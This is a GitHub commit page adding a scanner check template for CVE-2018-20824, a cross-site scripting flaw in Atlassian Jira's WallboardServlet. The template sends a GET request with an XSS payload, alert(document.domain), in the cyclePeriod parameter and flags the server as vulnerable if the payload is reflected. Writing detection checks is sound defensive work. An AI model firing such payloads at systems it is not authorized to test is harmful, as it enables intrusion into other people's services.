Skip to content

Commit

Permalink
Create CVE-2018-20824 - Atlassian Jira WallboardServlet Cross Site Sc…
Browse files Browse the repository at this point in the history
…ripting

Creating CVE-2018-20824 - Atlassian Jira WallboardServlet Cross Site Scripting
  • Loading branch information
mrrootsec authored Jul 13, 2023
1 parent 9bab08e commit 1e247a7
Showing 1 changed file with 22 additions and 0 deletions.
Original file line number Diff line number Diff line change
@@ -0,0 +1,22 @@
metadata:
language: v1-beta
name: "Atlassian Jira WallboardServlet <7.13.1 - Cross-Site Scripting"
description: "The WallboardServlet resource in Jira before version 7.13.1 allows remote attackers to inject arbitrary HTML or JavaScript via a cross-site scripting vulnerability in the cyclePeriod parameter."
author: "mrrootsec"
tags: "xss", "cve", "jira"

run for each:
potential_path = "/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)"

given request then
send request called jxss:
path: {potential_path}
method: "GET"

if {jxss.response.status_code} is "200" and "timeout: alert(document.domain)" in {jxss.response.body} then
report issue:
severity: medium
confidence: certain
detail: "Vulnerable to CVE-2018-20824 - The WallboardServlet resource in Jira before version 7.13.1 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the cyclePeriod parameter."
remediation: "Upgrade Jira to the latest version"
end if

0 comments on commit 1e247a7

Please sign in to comment.